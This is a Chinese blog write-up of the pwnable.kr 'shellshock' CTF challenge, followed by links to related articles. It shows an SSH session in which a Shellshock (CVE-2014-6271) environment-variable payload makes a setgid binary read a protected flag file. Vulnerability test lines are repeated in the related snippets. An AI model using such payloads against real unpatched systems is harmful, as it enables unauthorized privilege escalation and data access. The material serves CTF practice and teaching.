PWN shellshock [pwnable.kr]CTF writeup题解系列9

最新推荐文章于 2024-03-03 12:25:24 发布
最新推荐文章于 2024-03-03 12:25:24 发布
阅读量720 收藏
点赞数
分类专栏: pwnable.kr CTF 文章标签: ctf pwn 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103798246
版权

破壳漏洞

 

操作过程

root@mypwn:/ctf/work/pwnable.kr# ssh shellshock@pwnable.kr -p2222
shellshock@pwnable.kr's password: 
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \ 
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    / 
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \ 
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
                                                                     
- Site admin : daehee87@gatech.edu
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Wed Jan  1 12:14:12 2020 from 120.84.12.64
shellshock@prowl:~$ strings shellshock
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
getegid
__libc_start_main
GLIBC_2.2.5
fff.
[A\]
l$ L
t$(L
|$0H
/home/shellshock/bash -c 'echo shock_me'
;*3$"
GCC: (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.ctors
.dtors
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
call_gmon_start
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__JCR_LIST__
__do_global_dtors_aux
completed.6531
dtor_idx.6533
frame_dummy
__CTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
shellshock.c
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
data_start
setresuid@@GLIBC_2.2.5
_edata
_fini
setresgid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
__DTOR_END__
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
_end
_start
getegid@@GLIBC_2.2.5
__bss_start
main
_Jv_RegisterClasses
_init
shellshock@prowl:~$ ./shellshock 
shock_me
shellshock@prowl:~$ bash -c './shellshock;cat flag'
shock_me
cat: flag: Permission denied
shellshock@prowl:~$ ./bash -c './shellshock;cat flag'
shock_me
cat: flag: Permission denied
shellshock@prowl:~$ find .
.
./shellshock.c
./flag
./.bash_history
find: ‘./.bash_history’: Permission denied
./.pwntools-cache
./.pwntools-cache/update
./shellshock
./bash
./.irssi
./.irssi/config
shellshock@prowl:~$ sudo -l
[sudo] password for shellshock: 
Sorry, user shellshock may not run sudo on prowl.lawn.gatech.edu.
shellshock@prowl:~$ ls -l
total 960
-r-xr-xr-x 1 root shellshock     959120 Oct 12  2014 bash
-r--r----- 1 root shellshock_pwn     47 Oct 12  2014 flag
-r-xr-sr-x 1 root shellshock_pwn   8547 Oct 12  2014 shellshock
-r--r--r-- 1 root root              188 Oct 12  2014 shellshock.c
shellshock@prowl:~$ sudo ./shellshock 
[sudo] password for shellshock: 
shellshock is not in the sudoers file.  This incident will be reported.
shellshock@prowl:~$ cat shellshock.c
#include <stdio.h>
int main(){
	setresuid(getegid(), getegid(), getegid());
	setresgid(getegid(), getegid(), getegid());
	system("/home/shellshock/bash -c 'echo shock_me'");
	return 0;
}

shellshock@prowl:~$ echo shellshock.c
shellshock.c
shellshock@prowl:~$ echo shellshock
shellshock
shellshock@prowl:~$ id
uid=1019(shellshock) gid=1019(shellshock) groups=1019(shellshock)
shellshock@prowl:~$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 
this is a test
shellshock@prowl:~$ 
shellshock@prowl:~$ env x='() { :;}; bash -c "cat ./flag"' ./shellshock
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault (core dumped)
shellshock@prowl:~$ Connection to pwnable.kr closed by remote host.
Connection to pwnable.kr closed.
root@mypwn:/ctf/work/pwnable.kr#

破壳漏洞参考:https://www.freebuf.com/articles/system/45390.html

3riC5r
关注
专栏目录
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 1040
任务环境说明:服务器场景:Server1。
PWN dragon echo1 echo2 [pwnable.kr]CTF writeup题解系列16
重新启程
01-06 713
由于pwnable.kr说明了不要将题解的利用脚本直接提出来,所以我就简单说下思路,本篇包括三个题目 目录 0x01 dragon 0x02 echo1 0x03 echo2 0x01 dragon 执行步骤 整数溢出漏洞:pDragon->HP 的类型是 signed byte,所以当超过127,就是负数了。这就是整数溢出漏洞 uaf漏洞: 1. malloc person...
linux_pwnlab3.1_shellshock
insomnia的博客
06-18 553
replace the bash with vulnerable one $sudo ln -sf /bin/bash_shellshock /bin/sh 1.setUID program /*vul.c*/ #include <stdio.h> #include <stdlib.h> #include <unistd.h> void main(){ se...
pwnable.krshellshock
river
05-04 1114
shellshock 登陆上服务器看到有shellshock文件,还有一个bash文件,执行./shellshock shellshock不是CVE-20146271吗? 根据搜到的结果进行测试: 正常执行过程分析 Bash有一种独有的使用环境变量来定义函数的方法。如果环境变量的值以字符”(){”开头,那么这个变量就会被当作是一个导
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1383
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
CTFHub ShellShock解题记录
weixin_44732566的博客
04-07 1798
CTFHub Bypass disable_function ShellShock ShellShock,破壳漏洞,出现于2014年 可以通过以下命令来判断是否存在这个漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果结果中有 vulnerable说明存在这个漏洞,执行了echo vulnerable这个语句...
PWN flag [pwnable.kr]CTF writeup题解系列4
重新启程
01-01 950
直接看题目 这是一道逆向题目,直接下载下来看看 root@mypwn:/ctf/work/pwnable.kr# wget http://pwnable.kr/bin/flag --2020-01-01 09:37:31-- http://pwnable.kr/bin/flag Resolving pwnable.kr (pwnable.kr)... 128.61.240.205 ...
PWN uaf [pwnable.kr]CTF writeup题解系列13
重新启程
01-02 739
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 题目都已经介绍了这是一道Use After Free的题目,那我们就不用多想了,先看看题目主要内容 root@mypwn:/ctf/work/pwnable.kr# ssh uaf@pwnable.kr -p2222 uaf@pwnable.kr's password: ____ __...
PWN lotto [pwnable.kr]CTF writeup题解系列10
重新启程
01-02 823
目录 0x01题目 0x02解题思路 0x03题解 0x01题目 0x02解题思路 下载文件,检查一下情况 root@mypwn:/ctf/work/pwnable.kr# ssh lotto@pwnable.kr -p2222 lotto@pwnable.kr's password: ____ __ __ ____ ____ ____ ...
PWN passcode [pwnable.kr]CTF writeup题解系列5
重新启程
01-01 906
直接看题目: 连接服务器看看情况: root@mypwn:/ctf/work/pwnable.kr# ssh passcode@pwnable.kr -p2222 passcode@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | \|...
Lab-03--Shellshock.zip
12-22
包括SEED实验Lab-03--Shellshock的实验指导书和报告。
[WriteUp] pwnable.kr -- [shellshock]
qq_23026851的博客
07-31 473
题目: 解: 登录 检测是否存在shellshock漏洞: 上图有意思的地方在于,当输入“bash”时,没有触发shellshock漏洞;而“./bash”则触发了。究其原因,该服务器默认的bash程序没有shellshock漏洞,而当前目录下的这个vulnerable的“bash”是供我们练习专用的。 Shellshock的原理已经被探讨了很多,简单总结一下就是,当环境变量X被如此...
ctf web方向与php学习记录30之shellshock初见()
这周末在做梦的博客
12-03 707
本次分享的内容有关shellshock。一,知识学习1 unix shellbash、POSIX、API的学习笔记2 shellshock及相关漏洞总结一,历史二,介绍三,相关漏洞二,例题ctfhub shellshock wp 一,知识学习 1 unix shellbash、POSIX、API的学习笔记 2 shellshock及相关漏洞总结 一,历史 一个名为Shellshock的安全漏洞在2014年9月初被发现,并迅速导致互联网上的一系列攻击。这个漏洞可追溯到1989年发布的1.03版本。 二,
CTFHub ShellShock wp(详解)
m0_73195494的博客
03-03 968
个人理解:当一个环境变量以"() {"开头时,bash会将该环境变量解析为函数进行执行什么是ShellShock攻击?验证是否存在ShellShock漏洞(漏洞存在于之前的版本。
[linux] shellshock
weixin_30845171的博客
03-07 74
1> Test if the system is vulnerable     env X="() { :;} ; echo vulnerable" /bin/sh -c "echo completed" 2> Fix it     yum update bash -y 转载于:https://www.cnblogs.com/randywithj/p/4320375.html...
ctf-hub 进阶
h0ld1rs的博客
11-01 451
Bypass disable_function LD_PRELOAD LD_PRELOAD,是个环境变量,用于动态库的加载,动态库加载的优先级最高,一般情况下,其加载顺序为LD_PRELOAD>LD_LIBRARY_PATH>/etc/ld.so.cache>/lib>/usr/lib。应该比较接近windows下的DLL文件。 好家伙,开局蚁剑直接连,然后进行如下操作, 思路一 如图,直接执行命令肯定是不可以的 返回的127是什么? 参考此文章,我们可以得到如下结果 h
一款结合破壳(Shellshock)漏洞利用的Linux远程控制恶意软件Linux/XOR.DDoS 深入解析...
weixin_34227447的博客
03-08 1385
vvun91e0n · 2015/07/23 15:43原文:blog.malwaremustdie.org/2015/07/mmd…0x00 背景昨天又是忙碌的一天,因为我获知近期有破壳漏洞利用攻击,所以我们团队集合起来对所有近期的捕获到的互联网交叉流量中的ELF文件威胁 (ELF threats)进行检测。我查看了一套shell脚本的命令部分,立刻就知道它基本上就是Linux/XOR.DDoS...
[BJDCTF 2nd] cat_flag write up
MikeCoke的博客
05-13 1877
图中只有两种小猫,一只有鸡腿,一只没有鸡腿。很容易想到二进制数0,1。将图片用二进制表示为: 01000010 01001010 01000100 01111011 01001101 00100001 01100001 00110000 01111110 01111101 将二进制数转为16进制,再16进制转文本。 得到flag为: BJD{M!a0~} ...
Pwn_
09-16 244
__libc_csu_init _init _start call_gmon_start deregister_tm_clones register_tm_clones __do_global_dtors_aux frame_dummy __libc_csu_init __libc_csu_fini _fini !!!0和1本没有意义,在于你的解释方式!!!...
学习ctfpwn的网址
最新发布
03-15
当涉及到学习CTF(Capture The Flag)和Pwn(漏洞利用)的时候,以下是一些常用的网址和资源推荐: 1. CTFtime:https://ctftime.org/ - CTFtime是一个CTF竞赛的信息平台,你可以在这里找到各种CTF比赛的信息、题目和解答。 2. Pwnable.kr:http://pwnable.kr/ - Pwnable.kr是一个专注于Pwn题目的在线平台,****** CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ - CTF Wiki是一个开放的CTF知识库,包含了各种CTF相关的知识、技巧和工具的介绍和使用方法。 5. CTF365:https://ctf365.com/ - CTF365是一个在线的CTF训练平台,提供了各种类型的CTF题目供学习和挑战。 6. CTFlearn:https://ctflearn.com/ - CTFlearn是一个面向初学者的CTF学习平台,*********!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值